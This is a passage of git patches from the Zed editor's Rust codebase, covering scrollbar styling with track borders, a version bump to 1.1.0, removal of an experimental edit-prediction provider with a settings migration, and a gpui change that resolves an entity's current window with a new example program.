visibility: config.visibility, - track_color: config.track_color, + track_color: config.track_color.map(|color| TrackColors { + background: color, + has_border: config.border, + }), show_behavior, get_visibility: config.get_visibility, + style: config.style.unwrap_or_default(), show_state: VisibilityState::from_behavior(show_behavior), mouse_in_parent: true, last_prepaint_state: None, @@ -690,18 +731,15 @@ impl ScrollbarState { fn space_to_reserve_for(&self, axis: ScrollbarAxis) -> Option { (self.show_state.is_disabled().not() - && self.visibility.along(axis).needs_scroll_track() && self - .scroll_handle() - .max_offset() + .visibility .along(axis) - .is_zero() - .not()) + 
.needs_space_reserved(self.scroll_handle().max_offset().along(axis))) .then(|| self.space_to_reserve()) } fn space_to_reserve(&self) -> Pixels { - self.width.to_pixels() + 2 * SCROLLBAR_PADDING + self.style.to_pixels() + 2 * SCROLLBAR_PADDING } fn handle_to_track(&self) -> Option<&Handle> { @@ -783,8 +821,11 @@ impl ScrollbarState { } } - fn update_track_color(&mut self, track_color: Option) { - self.track_color = track_color; + fn update_colors(&mut self, track_color: Option, has_border: bool) { + self.track_color = track_color.map(|color| TrackColors { + background: color, + has_border, + }); } fn parent_hovered(&self, window: &Window) -> bool { @@ -975,7 +1016,7 @@ struct ScrollbarLayout { track_bounds: Bounds, cursor_hitbox: Hitbox, reserved_space: ReservedSpace, - track_background: Option<(Bounds, Hsla)>, + track_config: Option<(Bounds, TrackColors)>, axis: ScrollbarAxis, } @@ -1100,93 +1141,110 @@ impl Element for ScrollbarElement { window: &mut Window, cx: &mut App, ) -> Self::PrepaintState { - let prepaint_state = self - .state - .read(cx) - .disabled() - .not() - .then(|| ScrollbarPrepaintState { - thumbs: { - let state = self.state.read(cx); - let thumb_ranges = state.thumb_ranges().collect::>(); - let width = state.width.to_pixels(); - let track_color = state.track_color; - - let additional_padding = if thumb_ranges.len() == 2 { - width - } else { - Pixels::ZERO - }; + let prepaint_state = + self.state + .read(cx) + .disabled() + .not() + .then(|| ScrollbarPrepaintState { + thumbs: { + let state = self.state.read(cx); + let thumb_ranges = state.thumb_ranges().collect::>(); + let width = state.style.to_pixels(); + let track_color = state.track_color.as_ref(); + + let additional_padding = if thumb_ranges.len() == 2 { + width + } else { + Pixels::ZERO + }; - thumb_ranges - .into_iter() - .map(|(axis, thumb_range, reserved_space)| { - let track_anchor = match axis { - ScrollbarAxis::Horizontal => Anchor::BottomLeft, - ScrollbarAxis::Vertical => 
Anchor::TopRight, - }; - let Bounds { origin, size } = Bounds::from_anchor_and_size( - track_anchor, - bounds - .corner(track_anchor) - .apply_along(axis.invert(), |corner| { - corner - SCROLLBAR_PADDING + thumb_ranges + .into_iter() + .map(|(axis, thumb_range, reserved_space)| { + let track_anchor = match axis { + ScrollbarAxis::Horizontal => Anchor::BottomLeft, + ScrollbarAxis::Vertical => Anchor::TopRight, + }; + + let scroll_track_bounds = Bounds::from_anchor_and_size( + track_anchor, + self.origin + bounds.corner(track_anchor), + bounds.size.apply_along(axis.invert(), |_| { + width + + match state.style { + ScrollbarStyle::Regular => 2 * SCROLLBAR_PADDING, + ScrollbarStyle::Editor => Pixels::ZERO, + } }), - bounds.size.apply_along(axis.invert(), |_| width), - ); - let scroll_track_bounds = Bounds::new(self.origin + origin, size); + ); - let padded_bounds = scroll_track_bounds.extend(match axis { - ScrollbarAxis::Horizontal => Edges { - right: -SCROLLBAR_PADDING, - left: -SCROLLBAR_PADDING, - ..Default::default() - }, - ScrollbarAxis::Vertical => Edges { - top: -SCROLLBAR_PADDING, - bottom: -SCROLLBAR_PADDING, - ..Default::default() - }, - }); - - let available_space = - padded_bounds.size.along(axis) - additional_padding; - - let thumb_offset = thumb_range.start * available_space; - let thumb_end = thumb_range.end * available_space; - let thumb_bounds = Bounds::new( - padded_bounds - .origin - .apply_along(axis, |origin| origin + thumb_offset), - padded_bounds - .size - .apply_along(axis, |_| thumb_end - thumb_offset), - ); + let has_border = + track_color.is_some_and(|track_colors| track_colors.has_border); - let needs_scroll_track = reserved_space.needs_scroll_track(); - - ScrollbarLayout { - thumb_bounds, - track_bounds: padded_bounds, - axis, - cursor_hitbox: window.insert_hitbox( - if needs_scroll_track { - padded_bounds - } else { - thumb_bounds - }, - HitboxBehavior::BlockMouseExceptScroll, - ), - track_background: track_color - .filter(|_| 
needs_scroll_track) - .map(|color| (padded_bounds.dilate(SCROLLBAR_PADDING), color)), - reserved_space, - } - }) - .collect() - }, - parent_bounds_hitbox: window.insert_hitbox(bounds, HitboxBehavior::Normal), - }); + // Rounded style needs a bit of padding, whereas for editor scrollbars, + // we want the full length of the track + let thumb_container_bounds = match state.style { + ScrollbarStyle::Regular => { + scroll_track_bounds.dilate(-SCROLLBAR_PADDING) + } + ScrollbarStyle::Editor if has_border => scroll_track_bounds + .extend(match axis { + ScrollbarAxis::Horizontal => Edges { + top: -BORDER_WIDTH, + ..Default::default() + }, + + ScrollbarAxis::Vertical => Edges { + left: -BORDER_WIDTH, + ..Default::default() + }, + }), + ScrollbarStyle::Editor => scroll_track_bounds, + }; + + let available_space = + thumb_container_bounds.size.along(axis) - additional_padding; + + let thumb_offset = thumb_range.start * available_space; + let thumb_end = thumb_range.end * available_space; + let thumb_bounds = Bounds::new( + thumb_container_bounds + .origin + .apply_along(axis, |origin| origin + thumb_offset), + thumb_container_bounds + .size + .apply_along(axis, |_| thumb_end - thumb_offset), + ); + + let needs_scroll_track = reserved_space.needs_scroll_track(); + + ScrollbarLayout { + thumb_bounds, + track_bounds: thumb_container_bounds, + axis, + cursor_hitbox: window.insert_hitbox( + if needs_scroll_track { + if has_border && state.style == ScrollbarStyle::Editor { + scroll_track_bounds + } else { + thumb_container_bounds + } + } else { + thumb_bounds + }, + HitboxBehavior::BlockMouseExceptScroll, + ), + track_config: track_color + .filter(|_| needs_scroll_track) + .map(|color| (scroll_track_bounds, color.clone())), + reserved_space, + } + }) + .collect() + }, + parent_bounds_hitbox: window.insert_hitbox(bounds, HitboxBehavior::Normal), + }); if prepaint_state .as_ref() .is_some_and(|state| Some(state) != self.state.read(cx).last_prepaint_state.as_ref()) @@ -1196,27 
+1254,41 @@ impl Element for ScrollbarElement { } prepaint_state.map(|state| { - let autohide_delta = self.state.read(cx).show_state.animation_progress().map( - |(delta, delta_duration, should_invert)| { - window.with_element_state(id.unwrap(), |state, window| { + let autohide_delta = self + .state + .read(cx) + .show_state + .animation_state() + .map(|state| match state { + AnimationState::InProgress { + current_delta, + animation_duration: delta_duration, + showing: should_invert, + } => window.with_element_state(id.unwrap(), |state, window| { let state = state.unwrap_or_else(|| Instant::now()); let current = Instant::now(); - let new_delta = DELTA_MAX - .min(delta + (current - state).div_duration_f32(delta_duration)); - self.state - .update(cx, |state, _| state.show_state.set_delta(new_delta)); + let new_delta = DELTA_MAX.min( + current_delta + (current - state).div_duration_f32(delta_duration), + ); + self.state.update(cx, |state, _| { + let has_border = state + .track_color + .as_ref() + .is_some_and(|track_colors| track_colors.has_border); + state.show_state.set_delta(new_delta, has_border) + }); window.request_animation_frame(); let delta = if should_invert { - DELTA_MAX - delta + DELTA_MAX - current_delta } else { - delta + current_delta }; (ease_in_out(delta), current) - }) - }, - ); + }), + AnimationState::Stale => 1.0, + }); (state, autohide_delta) }) @@ -1243,7 +1315,9 @@ impl Element for ScrollbarElement { let capture_phase; if self.state.read(cx).visible() { - let thumb_state = &self.state.read(cx).thumb_state; + let state = self.state.read(cx); + let thumb_state = &state.thumb_state; + let style = state.style; if thumb_state.is_dragging() { capture_phase = DispatchPhase::Capture; @@ -1256,7 +1330,7 @@ impl Element for ScrollbarElement { cursor_hitbox, axis, reserved_space, - track_background, + track_config, .. 
} in &prepaint_state.thumbs { @@ -1271,12 +1345,14 @@ impl Element for ScrollbarElement { _ => (colors.scrollbar_thumb_background, false), }; + let blend_color = track_config + .as_ref() + .map(|(_, colors)| colors.background) + .unwrap_or(colors.surface_background); + let blending_color = if hovered || reserved_space.needs_scroll_track() { - track_background - .map(|(_, background)| background) - .unwrap_or(colors.surface_background) + blend_color } else { - let blend_color = colors.surface_background; blend_color.min(blend_color.alpha(MAXIMUM_OPACITY)) }; @@ -1286,25 +1362,52 @@ impl Element for ScrollbarElement { thumb_color.fade_out(fade); } - if let Some((track_bounds, color)) = track_background { - let mut color = *color; - if let Some(fade) = autohide_fade { - color.fade_out(fade); + if let Some((track_bounds, colors)) = track_config { + let has_border = colors.has_border; + + let mut track_color = colors.background; + if let Some(fade) = autohide_fade + && !has_border + { + track_color.fade_out(fade); } + let border_edges = has_border + .then(|| match axis { + ScrollbarAxis::Horizontal => Edges { + top: BORDER_WIDTH, + ..Default::default() + }, + ScrollbarAxis::Vertical => Edges { + left: BORDER_WIDTH, + ..Default::default() + }, + }) + .unwrap_or_default(); + + let border_color = if has_border { + cx.theme().colors().border_variant.opacity(0.6) + } else { + Hsla::transparent_black() + }; + window.paint_quad(quad( *track_bounds, Corners::default(), - color, - Edges::default(), - Hsla::transparent_black(), - BorderStyle::default(), + track_color, + border_edges, + border_color, + BorderStyle::Solid, )); } window.paint_quad(quad( *thumb_bounds, - Corners::all(Pixels::MAX).clamp_radii_for_quad_size(thumb_bounds.size), + match style { + ScrollbarStyle::Regular => Corners::all(Pixels::MAX) + .clamp_radii_for_quad_size(thumb_bounds.size), + ScrollbarStyle::Editor => Corners::default(), + }, thumb_color, Edges::default(), Hsla::transparent_black(), From 
4a13c244eb4f52a5f49d9416b92b52898c0c1eb3 Mon Sep 17 00:00:00 2001 From: "Joseph T. Lyons" Date: Mon, 27 Apr 2026 18:22:46 -0400 Subject: [PATCH 066/231] Bump Zed to v1.1.0 (#55035) Self-Review Checklist: - [ ] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [ ] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- Cargo.lock | 2 +- crates/zed/Cargo.toml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 0149c9e199e408..2457f314e32ab6 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -22390,7 +22390,7 @@ dependencies = [ [[package]] name = "zed" -version = "0.235.0" +version = "1.1.0" dependencies = [ "acp_thread", "acp_tools", diff --git a/crates/zed/Cargo.toml b/crates/zed/Cargo.toml index f66b6746696947..b77125796ab3ec 100644 --- a/crates/zed/Cargo.toml +++ b/crates/zed/Cargo.toml @@ -2,7 +2,7 @@ description = "The fast, collaborative code editor." 
edition.workspace = true name = "zed" -version = "0.235.0" +version = "1.1.0" publish.workspace = true license = "GPL-3.0-or-later" authors = ["Zed Team "] From f7de7eccc196059c5a20a1a3083ee90ebf4465c7 Mon Sep 17 00:00:00 2001 From: Ben Kunkle Date: Tue, 28 Apr 2026 02:41:38 -0500 Subject: [PATCH 067/231] ep: Remove old experimental provider (#55011) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A or Added/Fixed/Improved ... --- crates/agent_ui/src/agent_ui.rs | 3 +- crates/edit_prediction/src/edit_prediction.rs | 7 +-- .../src/edit_prediction_button.rs | 11 +--- .../src/migrations/m_2026_02_03/settings.rs | 13 ++++- crates/migrator/src/migrator.rs | 11 +++- crates/settings_content/src/language.rs | 55 ++----------------- .../zed/src/zed/edit_prediction_registry.rs | 1 - 7 files changed, 32 insertions(+), 69 deletions(-) diff --git a/crates/agent_ui/src/agent_ui.rs b/crates/agent_ui/src/agent_ui.rs index 4e37911f29497e..449194a738070f 100644 --- a/crates/agent_ui/src/agent_ui.rs +++ b/crates/agent_ui/src/agent_ui.rs @@ -585,8 +585,7 @@ fn update_command_palette_filter(cx: &mut App) { | EditPredictionProvider::Codestral | EditPredictionProvider::Ollama | EditPredictionProvider::OpenAiCompatibleApi - | EditPredictionProvider::Mercury - | EditPredictionProvider::Experimental(_) => { + | EditPredictionProvider::Mercury => { filter.show_namespace("edit_prediction"); filter.hide_namespace("copilot"); filter.show_action_types(edit_prediction_actions.iter()); diff --git a/crates/edit_prediction/src/edit_prediction.rs b/crates/edit_prediction/src/edit_prediction.rs index f43b94212c0699..824c45036b7fcc 
100644 --- a/crates/edit_prediction/src/edit_prediction.rs +++ b/crates/edit_prediction/src/edit_prediction.rs @@ -2109,8 +2109,7 @@ fn is_ep_store_provider(provider: EditPredictionProvider) -> bool { EditPredictionProvider::Zed | EditPredictionProvider::Mercury | EditPredictionProvider::Ollama - | EditPredictionProvider::OpenAiCompatibleApi - | EditPredictionProvider::Experimental(_) => true, + | EditPredictionProvider::OpenAiCompatibleApi => true, EditPredictionProvider::None | EditPredictionProvider::Copilot | EditPredictionProvider::Codestral => false, @@ -2145,9 +2144,7 @@ impl EditPredictionStore { let (needs_acceptance_tracking, max_pending_predictions) = match all_language_settings(None, cx).edit_predictions.provider { - EditPredictionProvider::Zed - | EditPredictionProvider::Mercury - | EditPredictionProvider::Experimental(_) => (true, 2), + EditPredictionProvider::Zed | EditPredictionProvider::Mercury => (true, 2), EditPredictionProvider::Ollama => (false, 1), EditPredictionProvider::OpenAiCompatibleApi => (false, 2), EditPredictionProvider::None diff --git a/crates/edit_prediction_ui/src/edit_prediction_button.rs b/crates/edit_prediction_ui/src/edit_prediction_button.rs index f80680d4e59dd0..d8e52fe8a7bb40 100644 --- a/crates/edit_prediction_ui/src/edit_prediction_button.rs +++ b/crates/edit_prediction_ui/src/edit_prediction_button.rs @@ -323,15 +323,12 @@ impl Render for EditPredictionButton { .with_handle(self.popover_menu_handle.clone()), ) } - provider @ (EditPredictionProvider::Experimental(_) - | EditPredictionProvider::Zed - | EditPredictionProvider::Mercury) => { + provider @ (EditPredictionProvider::Zed | EditPredictionProvider::Mercury) => { let enabled = self.editor_enabled.unwrap_or(true); let file = self.file.clone(); let language = self.language.clone(); let project = self.project.clone(); let provider_name: &'static str = match provider { - EditPredictionProvider::Experimental(name) => name, EditPredictionProvider::Zed => "zed", _ => 
"unknown", }; @@ -428,10 +425,8 @@ impl Render for EditPredictionButton { None }; - let zed_cloud_needs_sign_in = matches!( - provider, - EditPredictionProvider::Zed | EditPredictionProvider::Experimental(_) - ) && user.is_none(); + let zed_cloud_needs_sign_in = + matches!(provider, EditPredictionProvider::Zed) && user.is_none(); let provider_unavailable = missing_token || mercury_has_error || zed_cloud_needs_sign_in; diff --git a/crates/migrator/src/migrations/m_2026_02_03/settings.rs b/crates/migrator/src/migrations/m_2026_02_03/settings.rs index 6280d9370d9ff5..b3de3031be9e6d 100644 --- a/crates/migrator/src/migrations/m_2026_02_03/settings.rs +++ b/crates/migrator/src/migrations/m_2026_02_03/settings.rs @@ -41,7 +41,14 @@ fn migrate_provider_field(obj: &mut serde_json::Map, field_name: return; }; - if name == "sweep" || name == "mercury" { - obj.insert(field_name.to_string(), Value::String(name.to_string())); - } + let provider_name = match name { + "sweep" | "mercury" => name, + "zeta2" => "zed", + _ => return, + }; + + obj.insert( + field_name.to_string(), + Value::String(provider_name.to_string()), + ); } diff --git a/crates/migrator/src/migrator.rs b/crates/migrator/src/migrator.rs index 72cd7723ce69d5..ac7e4e337ed946 100644 --- a/crates/migrator/src/migrator.rs +++ b/crates/migrator/src/migrator.rs @@ -3199,7 +3199,16 @@ mod tests { } "# .unindent(), - None, + Some( + &r#" + { + "edit_predictions": { + "provider": "zed" + } + } + "# + .unindent(), + ), ); // Platform key: settings nested inside "linux" should be migrated diff --git a/crates/settings_content/src/language.rs b/crates/settings_content/src/language.rs index b9accd6b83d6df..d3f0e6a4195bae 100644 --- a/crates/settings_content/src/language.rs +++ b/crates/settings_content/src/language.rs @@ -2,7 +2,7 @@ use std::{num::NonZeroU32, path::Path}; use collections::{HashMap, HashSet}; use schemars::JsonSchema; -use serde::{Deserialize, Serialize, de::Error as _}; +use serde::{Deserialize, Serialize}; 
use settings_macros::{MergeFrom, with_fallible_options}; use std::sync::Arc; @@ -75,7 +75,9 @@ impl merge_from::MergeFrom for AllLanguageSettingsContent { } /// The provider that supplies edit predictions. -#[derive(Copy, Clone, Debug, Default, Eq, PartialEq, Serialize, JsonSchema, MergeFrom)] +#[derive( + Copy, Clone, Debug, Default, Eq, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom, +)] #[serde(rename_all = "snake_case")] pub enum EditPredictionProvider { None, @@ -86,50 +88,6 @@ pub enum EditPredictionProvider { Ollama, OpenAiCompatibleApi, Mercury, - Experimental(&'static str), -} - -const EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME: &str = "zeta2"; - -impl<'de> Deserialize<'de> for EditPredictionProvider { - fn deserialize(deserializer: D) -> Result - where - D: serde::Deserializer<'de>, - { - #[derive(Deserialize)] - #[serde(rename_all = "snake_case")] - pub enum Content { - None, - Copilot, - Zed, - Codestral, - Ollama, - OpenAiCompatibleApi, - Mercury, - Experimental(String), - } - - Ok(match Content::deserialize(deserializer)? 
{ - Content::None => EditPredictionProvider::None, - Content::Copilot => EditPredictionProvider::Copilot, - Content::Zed => EditPredictionProvider::Zed, - Content::Codestral => EditPredictionProvider::Codestral, - Content::Ollama => EditPredictionProvider::Ollama, - Content::OpenAiCompatibleApi => EditPredictionProvider::OpenAiCompatibleApi, - Content::Mercury => EditPredictionProvider::Mercury, - Content::Experimental(name) - if name == EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME => - { - EditPredictionProvider::Zed - } - Content::Experimental(name) => { - return Err(D::Error::custom(format!( - "Unknown experimental edit prediction provider: {}", - name - ))); - } - }) - } } impl EditPredictionProvider { @@ -141,8 +99,7 @@ impl EditPredictionProvider { | EditPredictionProvider::Codestral | EditPredictionProvider::Ollama | EditPredictionProvider::OpenAiCompatibleApi - | EditPredictionProvider::Mercury - | EditPredictionProvider::Experimental(_) => false, + | EditPredictionProvider::Mercury => false, } } @@ -152,7 +109,7 @@ impl EditPredictionProvider { EditPredictionProvider::Copilot => Some("GitHub Copilot"), EditPredictionProvider::Codestral => Some("Codestral"), EditPredictionProvider::Mercury => Some("Mercury"), - EditPredictionProvider::Experimental(_) | EditPredictionProvider::None => None, + EditPredictionProvider::None => None, EditPredictionProvider::Ollama => Some("Ollama"), EditPredictionProvider::OpenAiCompatibleApi => Some("OpenAI-Compatible API"), } diff --git a/crates/zed/src/zed/edit_prediction_registry.rs b/crates/zed/src/zed/edit_prediction_registry.rs index ad394cc5e760b6..5e41024589df1b 100644 --- a/crates/zed/src/zed/edit_prediction_registry.rs +++ b/crates/zed/src/zed/edit_prediction_registry.rs @@ -147,7 +147,6 @@ fn edit_prediction_provider_config_for_settings(cx: &App) -> Option Some(EditPredictionProviderConfig::Zed( EditPredictionModel::Mercury, )), - EditPredictionProvider::Experimental(_) => None, } } From 
6d6419fb3fdb434181924063b6049551db581cc2 Mon Sep 17 00:00:00 2001 From: Mikayla Maki Date: Tue, 28 Apr 2026 10:04:42 +0200 Subject: [PATCH 068/231] Query for window instead of capturing (#55059) This allows us to move entities between windows without breaking all the callbacks. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/gpui/Cargo.toml | 4 + .../examples/move_entity_between_windows.rs | 154 ++++++++++++++++++ crates/gpui/src/app.rs | 74 ++++++++- crates/gpui/src/app/async_context.rs | 49 +++++- crates/gpui/src/app/context.rs | 74 +++++---- crates/gpui/src/app/entity_map.rs | 9 +- crates/gpui/src/app/headless_app_context.rs | 11 +- crates/gpui/src/app/test_context.rs | 50 ++++-- crates/gpui/src/app/visual_test_context.rs | 17 +- crates/gpui/src/gpui.rs | 10 ++ crates/gpui_macros/src/derive_app_context.rs | 9 + crates/sidebar/src/sidebar_tests.rs | 2 +- 12 files changed, 392 insertions(+), 71 deletions(-) create mode 100644 crates/gpui/examples/move_entity_between_windows.rs diff --git a/crates/gpui/Cargo.toml b/crates/gpui/Cargo.toml index 9b1d4562deabde..38a8c6134d1aa4 100644 --- a/crates/gpui/Cargo.toml +++ b/crates/gpui/Cargo.toml @@ -180,6 +180,10 @@ naga.workspace = true name = "hello_world" path = "examples/hello_world.rs" +[[example]] +name = "move_entity_between_windows" +path = "examples/move_entity_between_windows.rs" + [[example]] name = "image" path = "examples/image/image.rs" diff --git a/crates/gpui/examples/move_entity_between_windows.rs b/crates/gpui/examples/move_entity_between_windows.rs new file mode 100644 index 00000000000000..6ad3c8fab0c0f3 --- /dev/null +++ 
b/crates/gpui/examples/move_entity_between_windows.rs @@ -0,0 +1,154 @@ +//! An entity registers callbacks via the `_in` API family and then gets +//! re-hosted in a new window via a click. The point of the example is to +//! demonstrate that callbacks dispatched after the move correctly target the +//! entity's *current* window rather than the window it was in at +//! registration time. +//! +//! To run: cargo run -p gpui --example move_entity_between_windows + +#![cfg_attr(target_family = "wasm", no_main)] + +use std::time::Duration; + +use gpui::{ + App, AppContext as _, Bounds, Context, EventEmitter, MouseButton, Render, SharedString, + Subscription, Task, Window, WindowBounds, WindowOptions, div, prelude::*, px, rgb, size, +}; +use gpui_platform::application; + +struct MoveToNewWindow; + +struct HelloWorld { + text: SharedString, + tick_count: u32, + move_count: u32, + _tasks: Vec>, + _subscriptions: Vec, +} + +impl EventEmitter for HelloWorld {} + +impl HelloWorld { + fn new(window: &mut Window, cx: &mut Context) -> Self { + let self_entity = cx.entity(); + + let task = cx.spawn_in(window, async move |this, cx| { + loop { + cx.background_executor().timer(Duration::from_secs(1)).await; + let result = this.update_in(cx, |this, window, _cx| { + this.tick_count += 1; + println!( + "tick #{} fired in entity's current window {}", + this.tick_count, + window.window_handle().window_id().as_u64(), + ); + }); + if let Err(err) = result { + println!("tick task giving up: {err}"); + return; + } + } + }); + + let subscription = cx.subscribe_in::<_, MoveToNewWindow>( + &self_entity, + window, + move |this, _emitter, _event, window, cx| { + let entered_window_id = window.window_handle().window_id().as_u64(); + println!( + "MoveToNewWindow handler fired in entity's current window {entered_window_id}", + ); + + this.move_count += 1; + cx.notify(); + + let entity = cx.entity(); + let old_window = window.window_handle(); + cx.defer(move |cx| { + let bounds = 
Bounds::centered(None, size(px(500.0), px(500.0)), cx); + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(bounds)), + ..Default::default() + }, + move |_, _| entity, + ) + .expect("failed to open new window"); + old_window + .update(cx, |_, window, _| window.remove_window()) + .ok(); + }); + }, + ); + + Self { + text: "World".into(), + tick_count: 0, + move_count: 0, + _tasks: vec![task], + _subscriptions: vec![subscription], + } + } +} + +impl Render for HelloWorld { + fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + let window_id = window.window_handle().window_id().as_u64(); + + div() + .flex() + .flex_col() + .gap_3() + .bg(rgb(0x505050)) + .size(px(500.0)) + .justify_center() + .items_center() + .text_xl() + .text_color(rgb(0xffffff)) + .child(format!("Hello, {}!", &self.text)) + .child(format!("Rendering in window: {window_id}")) + .child(format!("Ticks observed by entity: {}", self.tick_count)) + .child(format!("Moves observed by entity: {}", self.move_count)) + .child( + div() + .px_4() + .py_2() + .bg(rgb(0x4040ff)) + .rounded_md() + .child("Move me to a new window") + .on_mouse_down( + MouseButton::Left, + cx.listener(|_this, _, _window, cx| { + cx.emit(MoveToNewWindow); + }), + ), + ) + } +} + +fn run_example() { + application().run(|cx: &mut App| { + let bounds = Bounds::centered(None, size(px(500.0), px(500.0)), cx); + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(bounds)), + ..Default::default() + }, + |window, cx| cx.new(|cx| HelloWorld::new(window, cx)), + ) + .unwrap(); + cx.activate(true); + }); +} + +#[cfg(not(target_family = "wasm"))] +fn main() { + run_example(); +} + +#[cfg(target_family = "wasm")] +#[wasm_bindgen::prelude::wasm_bindgen(start)] +pub fn start() { + gpui_platform::web_init(); + run_example(); +} diff --git a/crates/gpui/src/app.rs b/crates/gpui/src/app.rs index 3642d46a3325fd..f19c780caa671d 100644 --- a/crates/gpui/src/app.rs +++ 
b/crates/gpui/src/app.rs @@ -638,6 +638,7 @@ pub struct App { pub(crate) window_invalidators_by_entity: FxHashMap>, pub(crate) tracked_entities: FxHashMap>, + pub(crate) current_window_by_entity: FxHashMap, #[cfg(any(feature = "inspector", debug_assertions))] pub(crate) inspector_renderer: Option, #[cfg(any(feature = "inspector", debug_assertions))] @@ -715,6 +716,7 @@ impl App { observers: SubscriberSet::new(), tracked_entities: FxHashMap::default(), window_invalidators_by_entity: FxHashMap::default(), + current_window_by_entity: FxHashMap::default(), event_listeners: SubscriberSet::new(), release_listeners: SubscriberSet::new(), keystroke_observers: SubscriberSet::new(), @@ -952,6 +954,8 @@ impl App { .entry(*entity) .or_default() .insert(window_handle.id, invalidator.clone()); + self.current_window_by_entity + .insert(*entity, window_handle.id); } tracked_entities.clear(); tracked_entities.extend(entities.iter().copied()); @@ -1458,6 +1462,8 @@ impl App { for (entity_id, mut entity) in dropped { self.observers.remove(&entity_id); self.event_listeners.remove(&entity_id); + self.window_invalidators_by_entity.remove(&entity_id); + self.current_window_by_entity.remove(&entity_id); for release_callback in self.release_listeners.remove(&entity_id) { release_callback(entity.as_mut(), self); } @@ -1534,6 +1540,13 @@ impl App { tid: TypeId, window: Option, ) { + // Seed the entity's current window from its creation context so + // `with_window` resolves correctly before the entity has ever been + // rendered. 
+ if let Some(id) = window { + self.current_window_by_entity.insert(entity.entity_id(), id); + } + self.new_entity_observers.clone().retain(&tid, |observer| { if let Some(id) = window { self.update_window_id(id, { @@ -1548,7 +1561,28 @@ impl App { }); } - fn update_window_id(&mut self, id: WindowId, update: F) -> Result + /// Run `f` against the entity's *current* window — the most recently + /// rendered window that referenced the entity, or its creation window if + /// it has yet to be rendered. Returns `None` if the entity has no + /// current window, or if that window has been closed, or if it is + /// already on the update stack. + pub fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + let window_id = *self.current_window_by_entity.get(&entity_id)?; + self.update_window_id(window_id, |_, window, cx| f(window, cx)) + .ok() + } + + fn ensure_window(&mut self, entity_id: EntityId, window: WindowId) { + self.current_window_by_entity + .entry(entity_id) + .or_insert(window); + } + + pub(crate) fn update_window_id(&mut self, id: WindowId, update: F) -> Result where F: FnOnce(AnyView, &mut Window, &mut App) -> T, { @@ -1565,6 +1599,18 @@ impl App { if window.removed { cx.window_handles.remove(&id); cx.windows.remove(id); + if let Some(tracked) = cx.tracked_entities.remove(&id) { + for entity_id in tracked { + if let Some(windows) = + cx.window_invalidators_by_entity.get_mut(&entity_id) + { + windows.remove(&id); + } + if cx.current_window_by_entity.get(&entity_id) == Some(&id) { + cx.current_window_by_entity.remove(&entity_id); + } + } + } cx.window_closed_observers.clone().retain(&(), |callback| { callback(cx, id); @@ -2281,13 +2327,27 @@ impl App { .or_default(), ); - if window_invalidators.is_empty() { + // `window_invalidators_by_entity` is monotonic, so an entry alone + // doesn't mean the window is currently rendering the entity. 
Filter + // through `tracked_entities` to keep invalidation tight to windows + // that actually display this entity right now. + let live_invalidators: SmallVec<[WindowInvalidator; 2]> = window_invalidators + .iter() + .filter(|(window_id, _)| { + self.tracked_entities + .get(window_id) + .is_some_and(|set| set.contains(&entity_id)) + }) + .map(|(_, invalidator)| invalidator.clone()) + .collect(); + + if live_invalidators.is_empty() { if self.pending_notifications.insert(entity_id) { self.pending_effects .push_back(Effect::Notify { emitter: entity_id }); } } else { - for invalidator in window_invalidators.values() { + for invalidator in &live_invalidators { invalidator.invalidate_view(entity_id, self); } } @@ -2423,6 +2483,14 @@ impl AppContext for App { self.update_window_id(handle.id, update) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + App::with_window(self, entity_id, f) + } + fn read_window( &self, window: &WindowHandle, diff --git a/crates/gpui/src/app/async_context.rs b/crates/gpui/src/app/async_context.rs index e2fd203c78364a..be917764f4366b 100644 --- a/crates/gpui/src/app/async_context.rs +++ b/crates/gpui/src/app/async_context.rs @@ -1,8 +1,8 @@ use crate::{ AnyView, AnyWindowHandle, App, AppCell, AppContext, BackgroundExecutor, BorrowAppContext, - Entity, EventEmitter, Focusable, ForegroundExecutor, Global, GpuiBorrow, PromptButton, - PromptLevel, Render, Reservation, Result, Subscription, Task, VisualContext, Window, - WindowHandle, + Entity, EntityId, EventEmitter, Focusable, ForegroundExecutor, Global, GpuiBorrow, + PromptButton, PromptLevel, Render, Reservation, Result, Subscription, Task, VisualContext, + Window, WindowHandle, }; use anyhow::{Context as _, bail}; use derive_more::{Deref, DerefMut}; @@ -94,6 +94,19 @@ impl AppContext for AsyncApp { lock.update_window(window, f) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> 
